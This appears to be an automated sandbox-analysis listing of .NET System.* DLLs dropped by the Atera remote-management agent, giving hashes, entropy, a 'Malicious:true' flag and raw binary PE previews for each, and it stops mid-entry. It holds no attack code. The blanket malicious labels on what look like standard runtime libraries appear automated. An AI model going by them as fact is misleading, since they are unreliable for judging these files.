                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.892768295837973
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:5AJpVWbfkBnWdNyb8E9VF6IYinAM+oCn2D:5AJpWfkBEEpYinAMxC8
                                                                                                                                                                                                                                        MD5:1FCB2BF5F5DB0FB5EF27A1A27CAC6839
                                                                                                                                                                                                                                        SHA1:BFC1849448A34162F2B49EE2DB5EB90E61246EF1
                                                                                                                                                                                                                                        SHA-256:1FB75E96E9035269EFA260F0B670ECD5C51C3620B4F0BD221D64F4E5F9A744B5
                                                                                                                                                                                                                                        SHA-512:04D30E22C065D670A959AA426B409B2C9CF4AA177EDC1A2A947117AB63BB09914488694FD0920FDEAD1064185B2A3AF236583B17AD6C5A511707EB3CD5AE66A2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............>)... ...@....... ...............................Q....@..................................(..O....@..`...............0(...`.......'............................................... ............... ..H............text...D.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................ )......H.......P ......................4'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...........@...\.@...0.-...`.....D.................C.................[.....x.....-.........................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.#...C.>...K.^...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):21040
                                                                                                                                                                                                                                        Entropy (8bit):6.542545481530583
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:w8R71h7yzt94dHWFgQBVWeHWFyTBVWMNyb8E9VF6IYinAM+oCRN0pqZ:x1dyAqgQBfqyTBjEpYinAMxCL
                                                                                                                                                                                                                                        MD5:F061E66A2912461967F8C6D994DB2D42
                                                                                                                                                                                                                                        SHA1:CDCC153E0D7666D2E6B55BD02D959AD2A978C389
                                                                                                                                                                                                                                        SHA-256:9D6C00F7F5567207291611C9196B0B64477CD1293EEF8A00F71709377E7CCFF2
                                                                                                                                                                                                                                        SHA-512:88E0A25783661DCFC01802836B159E74D119DE3642FD63F4ABDE862818E67793AB9E74309A9CF4C78AD693A1A24A22E84D49270C91062899D390947FD5494A4C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............8... ...@....... ...............................B....@..................................8..O....@..8............*..0(...`.......7............................................... ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`.......(..............@..B.................8......H.......|!..l............1..p...X7......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*..BSJB............v4.0.30319......l.......#~..h.......#Strings....\...4...#US.........#GUID...........#Blob...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18992
                                                                                                                                                                                                                                        Entropy (8bit):6.6833377934930756
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:lpsBljcZQIVI8CNwbcyMWs4oBOW9MWG4tBOWUNyb8E9VF6IYinAM+oCZ8oos8:jsPMQMI8COYyi4oBNw4tBEEpYinAMxCM
                                                                                                                                                                                                                                        MD5:3D559EF1A45FB9630B459402AEF6F8B8
                                                                                                                                                                                                                                        SHA1:33F7170DA11336FED87EE675C5CEF6DF451399AB
                                                                                                                                                                                                                                        SHA-256:1B2A1BCF7439BFDD6B636403B9B6CFE9D4BF837A5DD6F311602CCB94DB196E04
                                                                                                                                                                                                                                        SHA-512:884657D217B0887213EE50EF5E4A9FEDB8A4112AB945BD11E86C092F091AAD5CFECC099EE7592BA5497EE4A24B611C6E64A79B5C8D543561B6F02783C5A992B1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............3... ...@....... ...............................)....@..................................3..O....@..............."..0(...`.......2............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................3......H........!..0...................L2.......................................s....*..s....*..0...........o....u......,..o....*.*.0..%........s..........(....r...p.$o......o....*:.(......}....*..{....*.(....z.(....z6.{.....o....*:.{......o....*.(....z:.{......o....*.(....z.(....z.BSJB............v4.0.30319......l.......#~.. .......#Strings....$...0...#US.T.......#GUID...d.......#Blob...........W..........3............................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):23600
                                                                                                                                                                                                                                        Entropy (8bit):6.319974787771213
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:obhigwLAuZtM66g/Id7WVXWwNyb8E9VF6IYinAM+oCdTLgf:obhzkKs1EpYinAMxCKf
                                                                                                                                                                                                                                        MD5:78B4627C28B942A9F3E3A42B7F2B5CC8
                                                                                                                                                                                                                                        SHA1:67FDCDA750F45F4A8D68EF9FD92096A0CB84CFB4
                                                                                                                                                                                                                                        SHA-256:9511AC4DFB3C3CED151095125D185665B5E38632A6B801A19121264AA2A0C0FE
                                                                                                                                                                                                                                        SHA-512:BCD3079A96D585E3EAFE2071E1D7540326D7C5781CD88A74B09E13C1B0553E0E1D84675722BBC060AFF67EBD356CB17C884EBBCE572A354218A5328558BDB0E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..*.........."H... ...`....... ...................................@..................................G..O....`...............4..0(...........F............................................... ............... ..H............text...((... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H.......P ...%...................F......................................BSJB............v4.0.30319......l.......#~..........#Strings.....#......#US..#......#GUID....#......#Blob......................3................................................_.........................8.....8...*.8.....8.....8.....8.....8.....8.........*.8.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8703306107292
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:DUcX6W9aWmNyb8E9VF6IYinAM+oC7y5dY:DUchSEpYinAMxCd
                                                                                                                                                                                                                                        MD5:314D0F60DF6AEDD8C51385987552AC01
                                                                                                                                                                                                                                        SHA1:1D41480C364F35570E55B2FE99D2CCF9AE8DECC0
                                                                                                                                                                                                                                        SHA-256:EBD0B986AFB5891FD1BA4F96AD1A398A3CF73E4626DCDF7A342C7B77008719AF
                                                                                                                                                                                                                                        SHA-512:FD213E8653B0D43E3BB7B4522CAEF1EB2CB72CA15DF1606E1CB2AAB38F290F2C75653DD3E863F78036C32FB1D2EBEEAFC946E2B5AA0B7F640EEAF8904476FBD0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............B)... ...@....... ..............................~.....@..................................(..O....@..................0(...`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....(.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):41008
                                                                                                                                                                                                                                        Entropy (8bit):5.951902601332249
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:NoBj7kS+8mjvHTeaWKs0Sd4eerEpYinAMxCrn:wPmb9WKs0PeeE7Hxgn
                                                                                                                                                                                                                                        MD5:F70417027E49DF72A70BCB33DA7E7B28
                                                                                                                                                                                                                                        SHA1:41D25C11377565055C1B193E3BD7F9FA82463A8B
                                                                                                                                                                                                                                        SHA-256:0D3EB5856AA09AF984D251AE6813D79D796E8950B1983E0403E2FC4E837300E3
                                                                                                                                                                                                                                        SHA-512:8966A0987612A52033E08B81B7C626EE4C45F3778480B571C594E81C412964513C8CC25EBB48AFF7F4DFED6CC8925EE147F11D66BF385298ACB5044DDDE9753D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..h.............. ........... ....................................@.................................u...O.......8............x..0(........................................................... ............... ..H............text....f... ...h.................. ..`.rsrc...8............j..............@..@.reloc...............v..............@..B........................H.......P'..\8..........._...%..,.......................................j~....%-.&(F...s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2rI..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r9..p.(....*2rm..p.(....*2r...p.(....*2r...p.(....*2r=..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.895003478802772
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:CTI2pWPzWKNyb8E9VF6IYinAM+oCWxypY1:CE3bEpYinAMxCppY
                                                                                                                                                                                                                                        MD5:8318C53B5520AB63B90855464DD9A577
                                                                                                                                                                                                                                        SHA1:E26617567FE2BBD5D20C973206F4F929BB1461FA
                                                                                                                                                                                                                                        SHA-256:A29B0C31E6BBC7E3ABC0A896100E3F239921114F3958FA659711F01E08A7DC2C
                                                                                                                                                                                                                                        SHA-512:257BA6A812503C829B83B487D52D41381A565EEDB16972836E7473B72028A3FEB9ABE4CE5F656CC3071D6EF09BC66781F724A3A398A0EF4494E1F753331EF415
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............^)... ...@....... ....................................@..................................)..O....@..`...............0(...`.......'............................................... ............... ..H............text...d.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................@)......H.......P ......................T'......................................BSJB............v4.0.30319......l.......#~..,.......#Strings............#US.........#GUID...........#Blob......................3......................................z...........A...\.A...0.....a.....D.................C.................[.....x.....-.........................(.....(.....(...).(...1.(...9.(...A.(...I.(...Q.(...Y.(...a.(...i.(...q.(.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.913085907758278
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Icezoy4W04WFNyb8E9VF6IYinAM+oCmuXU:IBzoy+DEpYinAMxCPU
                                                                                                                                                                                                                                        MD5:25CE99B51343F73E078818EF39CECAD3
                                                                                                                                                                                                                                        SHA1:A289B2DB50400CED6F3979FDDE0359B434A1C8A3
                                                                                                                                                                                                                                        SHA-256:9D5B4450E4AEE76EFDF5B842B68F2B48CD85AAA6DB3E837F42A1C5EEB0C476C2
                                                                                                                                                                                                                                        SHA-512:0BE989D7160C6A3BC3E81F2BDB50A972583958B7CB98B0CD7BD8DDEA7AAFCF8577B44DFB386DF698C62662D46461E4F3C61955AEB8E4E01BAA748DE40D4E334A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............~)... ...@....... ...............................p....@.................................,)..O....@..................0(...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`)......H.......P ..$...................t'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID....... ...#Blob......................3..................................................f...o.f...C.S.........W.................V...........%.....n...........@.....)...................M.....M.....M...).M...1.M...9.M...A.M...I.M...Q.M...Y.M...a.M...i.M...q.M.......................#.....+.....3.....;.'...C.B...K.b...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.796865766112091
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cegHWexY+WKpW5ryNyby2sE9jBF6IYiYF8pA5K+oCGUHFjekeSEZ:6H/JWKpWwNyb8E9VF6IYinAM+oCXlEZ
                                                                                                                                                                                                                                        MD5:5C98C3495637D44500977836D8610930
                                                                                                                                                                                                                                        SHA1:8071FE6AF722B3DF2FC27ED3A664FE6D111D111A
                                                                                                                                                                                                                                        SHA-256:158EB08B18B89F37A8DBCD883AF278D64395F5690B0E20E8E53FE90553673D60
                                                                                                                                                                                                                                        SHA-512:4678ED7C2464B839890643175F3BCCE001A31BDF7AE772284B8D034F1C98A38F21DBDC4B5BB6C97847AFD9E9CBA9BB72C6DCF54FA3E35FE4741FFE2336D61001
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0............."*... ...@....... ....................................@..................................)..O....@..................0(...`.......(............................................... ............... ..H............text...(.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID....... ...#Blob......................3............................................................o.s...........D.....D.....D.....D...8.D...Q.D.....D.....D...l.....U.D.................m.....m.....m...).m...1.m...9.m...A.m...I.m...Q.m...Y.m...a.m...i.m...q.m.......................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16944
                                                                                                                                                                                                                                        Entropy (8bit):6.745064610643482
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ETjbocNsWMhWbNyb8E9VF6IYinAM+oCtLQzmM:oboYy8EpYinAMxCtGJ
                                                                                                                                                                                                                                        MD5:86F97766833A9CD05E5FCDF689FAD7BC
                                                                                                                                                                                                                                        SHA1:38D8C0E1AE4DCA60242A2FA1F0F53D84789C6DCB
                                                                                                                                                                                                                                        SHA-256:4194F13F4B59A01BC371F2D189527B57DDACD30CE5801874D258A043D64C3F26
                                                                                                                                                                                                                                        SHA-512:90F9532D28B3C5D40BF12236C42E82282D4A5036A16EA784EDC0ABA44066D95EC807567352F356F83A618BEDF3EEF61847919CC1F2A3E097AB75D16A7618184F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.................. ...@....... ..............................}.....@..................................-..O....@..................0(...`.......,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................,......................................BSJB............v4.0.30319......l.......#~......|...#Strings....x.......#US.|.......#GUID.......(...#Blob......................3................................'.....).........u.................=......."...:."...W.".....".....".....".....".....".....[.....".................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;./...C.J...K.j...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Principal.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.843053619438805
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cnfExAJsjWVWhW5W9Nyby2sE9jBF6IYiYF8pA5K+oCGUHFvpHIq8anQcK5:ISKiWIhWCNyb8E9VF6IYinAM+oCLp855
                                                                                                                                                                                                                                        MD5:E57E5571CFD4504E72D174BA5DBEA004
                                                                                                                                                                                                                                        SHA1:A5C9E12D1833450B9BBEA5C21A2C7BB068621731
                                                                                                                                                                                                                                        SHA-256:BDA638D1E444C3F9A4BC4414B7DF4DFC6FA965AF621733147CBD6B4482F33545
                                                                                                                                                                                                                                        SHA-512:8AEB5548AF99E0C67EE44BBAC2A865BD79CB0A6350D7D2A4002814CF8F591E2ED479BD92CA8D37058FC50C56AAEF0A9462D6278891AA010A3FA7DBCF2708FE64
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................Nw....@.................................t(..O....@.. ...............0(...`......<'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..l....................&......................................BSJB............v4.0.30319......l.......#~......@...#Strings....D.......#US.H.......#GUID...X.......#Blob......................3......................................................\.....0.....'.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.7910515765195045
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:K0KbZWApWmWTpWeNyb8E9VF6IYinAM+oCkp8ZzO:tKRylEpYinAMxC3U
                                                                                                                                                                                                                                        MD5:7E0868D263799B242359950875723DE8
                                                                                                                                                                                                                                        SHA1:3576BEEBB1DA20AB3C578ED70C240CE597662E3A
                                                                                                                                                                                                                                        SHA-256:DA130E3183F408D0B24145C1B2095D451BA5F266D08A1BC3305F7BBE88C3BE73
                                                                                                                                                                                                                                        SHA-512:004BEA5E753F3A8C00395E971C254F850CA805E59A671D6A393B4651279EBD4DB3FB0597822E0AFFBB2F1F0A70F807C32B58D092ED0F83A282F93E0FA77D4080
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............)... ...@....... ..............................W#....@.................................>)..O....@..................0(...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................r)......H.......p .......................(........................................(....*..(....*..(....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings....`.......#US.h.......#GUID...x...(...#Blob...........G..........3.............................................."...........C...........u...............m.b...........J.....J.....J.....J...6.J...O.J.....J.....J...j.C...S.J.............................P ............X ............` ......4.....h ....................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.878184697843205
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cz+xx8u2SWCXW53JNyby2sE9jBF6IYiYF8pA5K+oCGUHFTY3rDS38:3b1nWCXWzNyb8E9VF6IYinAM+oCnY3C8
                                                                                                                                                                                                                                        MD5:54DECB83A83722723EA3C9EE1D507049
                                                                                                                                                                                                                                        SHA1:E3849BA70B6066D39255A42A699BFA92BA44580A
                                                                                                                                                                                                                                        SHA-256:B84D56CA7C9FFBF1DEE16BEB81F34505EA8040024ADAB90A31F5BB672EFBACFD
                                                                                                                                                                                                                                        SHA-512:D6A709FE90FC22AA2C54114E0A12E7C9911F1C89B77DD36DD6D3371FDCBD8963180879BEA2E93863A0CA5664E486EB7F057D4C36AAF1640F24D7A44C144CF0F7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ...............................5....@..................................(..O....@..T...............0(...`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~.. ...t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....6.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.7788582069292636
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cCc6cYxmPlW7TW5KhNyby2sE9jBF6IYiYF8pA5K+oCGUHFFr9I+lt7:pTyW7TWWNyb8E9VF6IYinAM+oCRr9r7
                                                                                                                                                                                                                                        MD5:350269AA965975EFA1F84E0090CD37B3
                                                                                                                                                                                                                                        SHA1:B355FB69FCB00C23E456CFB19F865CA6CFFF38FB
                                                                                                                                                                                                                                        SHA-256:88E31C83F3826888B5838DFDB4507AE642F4BB9F39D53E03C15EEF68923306A3
                                                                                                                                                                                                                                        SHA-512:6681A60159795220B9A346B01A4EA9E7AD9E67FC1B717AB0A68B9BB8F5DAD3D84250E6EFD774FE8639F7292934B1A7C586F64D7643B7FA4E528670E5D0195DD6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............2*... ...@....... ...............................S....@..................................)..O....@..................0(...`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ......................((......................................BSJB............v4.0.30319......l...0...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.7.....7.....7...C.7.....7.....7...[.7...x.7...-.0.....7.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.907751586883936
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:T6Rb32WVzW+Nyb8E9VF6IYinAM+oC0WmSv2:WRb3dfEpYinAMxCwSv2
                                                                                                                                                                                                                                        MD5:8025A24F4FDE9436715579E7B2193331
                                                                                                                                                                                                                                        SHA1:B8B111882ECB33F590A009FF3B5019F20D10A31F
                                                                                                                                                                                                                                        SHA-256:E7BAA99C670C4AC1FF575202B6BC75E502A32DAE1CFAD930A54E0BA1E40CF9EC
                                                                                                                                                                                                                                        SHA-512:5C50CCD385DFD2ACD255F7989E3FF4AE62AE9F946B1AA79BE19B90D4FB1B96B56865D2B4CAB03F18D17768AB7CF2BB5DFB763688C50B978E430E430D3CF5A425
